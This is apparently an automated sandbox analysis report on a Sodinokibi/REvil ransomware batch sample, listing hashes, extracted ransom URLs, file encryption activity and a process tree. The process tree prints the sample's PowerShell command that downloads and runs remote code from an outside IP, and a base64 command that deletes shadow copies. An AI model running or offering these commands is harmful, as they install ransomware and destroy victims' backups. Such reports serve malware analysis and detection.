Analysis

Max time kernel: 34s
Max time network: 35s
Platform: windows7_x64
Resource: win7v200430
Submitted: 23-05-2020 16:10

Static task: static1

Behavioral task: behavioral1
  Sample: aa924bdd41c78914cf9c258c5b04d440.bat
  Resource: win7v200430

Behavioral task: behavioral2
  Sample: aa924bdd41c78914cf9c258c5b04d440.bat
  Resource: win10v200430
General

Target: aa924bdd41c78914cf9c258c5b04d440.bat
Size: 217B
MD5: 73b18c7ea72367714adfa391d407d44b
SHA1: 936cfb5cb7073a9e298eed93720a1e73b88b50b8
SHA256: efb6eff4932c6a31030f3eff665d0228d063c0fc37fb274278e9ceb7e55f2fe8
SHA512: 60a9438888dc461e3c90e4df597bbe9420c700f1df7a62ede10b1e44a595336c948b4ec520a4589bc1f2f542d5c6e1b3388f55fead8501b40d843f3dbe3d3c98
Malware Config

Extracted
  http://185.103.242.78/pastes/aa924bdd41c78914cf9c258c5b04d440

Extracted
  C:\62mfmn-readme.txt
  sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5B24DC294A8BCFD9
  http://decryptor.cc/5B24DC294A8BCFD9
Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Suspicious use of WriteProcessMemory (5 IoCs)
Processes (description / pid / process / target process):
  PID 1052 wrote to memory of 1312   1052  cmd.exe         powershell.exe
  PID 1312 wrote to memory of 784    1312  powershell.exe  powershell.exe
  PID 1312 wrote to memory of 784    1312  powershell.exe  powershell.exe
  PID 1312 wrote to memory of 784    1312  powershell.exe  powershell.exe
  PID 1312 wrote to memory of 784    1312  powershell.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes (description / pid / process):
  Token: SeDebugPrivilege         1312  powershell.exe
  Token: SeDebugPrivilege         1312  powershell.exe
  Token: SeDebugPrivilege         784   powershell.exe
  Token: SeBackupPrivilege        1780  vssvc.exe
  Token: SeRestorePrivilege       1780  vssvc.exe
  Token: SeAuditPrivilege         1780  vssvc.exe
  Token: SeTakeOwnershipPrivilege 1312  powershell.exe

Suspicious behavior: EnumeratesProcesses (77 IoCs)
Processes (pid / process; the 77 entries repeat these two pairs):
  1312  powershell.exe
  784   powershell.exe

Blacklisted process makes network request (1 IoCs)
Processes (flow / pid / process):
  1  1312  powershell.exe

Modifies service (2 TTPs, 4 IoCs)
Processes (description / ioc / process):
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                 vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer               vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                      vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe

Drops file in Program Files directory (30 IoCs)
Processes (description / ioc / process):
  File opened for modification  \??\c:\program files\PopExit.mpe                                                    powershell.exe
  File opened for modification  \??\c:\program files\SplitPublish.docx                                              powershell.exe
  File opened for modification  \??\c:\program files\StartInvoke.ini                                                powershell.exe
  File opened for modification  \??\c:\program files\WriteSplit.doc                                                 powershell.exe
  File opened for modification  \??\c:\program files\GroupSelect.MTS                                                powershell.exe
  File opened for modification  \??\c:\program files\ConvertCheckpoint.wps                                          powershell.exe
  File opened for modification  \??\c:\program files\PingImport.svgz                                                powershell.exe
  File opened for modification  \??\c:\program files\SubmitStep.mpeg                                                powershell.exe
  File created                  \??\c:\program files (x86)\62mfmn-readme.txt                                        powershell.exe
  File opened for modification  \??\c:\program files\CopyClear.php                                                  powershell.exe
  File opened for modification  \??\c:\program files\EnableUse.mpg                                                  powershell.exe
  File opened for modification  \??\c:\program files\SuspendSet.fon                                                 powershell.exe
  File opened for modification  \??\c:\program files\CloseUnlock.i64                                                powershell.exe
  File opened for modification  \??\c:\program files\PingComplete.xht                                               powershell.exe
  File opened for modification  \??\c:\program files\SubmitConnect.mp2v                                             powershell.exe
  File opened for modification  \??\c:\program files\SubmitPop.au3                                                  powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\62mfmn-readme.txt         powershell.exe
  File opened for modification  \??\c:\program files\RegisterResume.m3u                                             powershell.exe
  File opened for modification  \??\c:\program files\ResetSync.emz                                                  powershell.exe
  File created                  \??\c:\program files\62mfmn-readme.txt                                              powershell.exe
  File opened for modification  \??\c:\program files\MeasureUnblock.vb                                              powershell.exe
  File opened for modification  \??\c:\program files\RedoMove.jpeg                                                  powershell.exe
  File opened for modification  \??\c:\program files\UpdateUninstall.wm                                             powershell.exe
  File opened for modification  \??\c:\program files\WaitResolve.jpg                                                powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\62mfmn-readme.txt    powershell.exe
  File opened for modification  \??\c:\program files\DisableResize.mov                                              powershell.exe
  File opened for modification  \??\c:\program files\WriteCopy.7z                                                   powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\62mfmn-readme.txt  powershell.exe
  File opened for modification  \??\c:\program files\UninstallEnable.xlsb                                           powershell.exe
  File opened for modification  \??\c:\program files\RestoreMeasure.vst                                             powershell.exe

Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Processes (description / ioc / process):
  Set value (str)  \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7j946621.bmp"  powershell.exe

Enumerates connected drives (3 TTPs)

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
Processes (pid / process):
  1312  powershell.exe
Processes

C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\aa924bdd41c78914cf9c258c5b04d440.bat"
  PID: 1052
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/aa924bdd41c78914cf9c258c5b04d440');Invoke-JYKVBWWUMA;Start-Sleep -s 10000"
    PID: 1312
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      PID: 784
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\vssvc.exe
  C:\Windows\system32\vssvc.exe
  PID: 1780
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service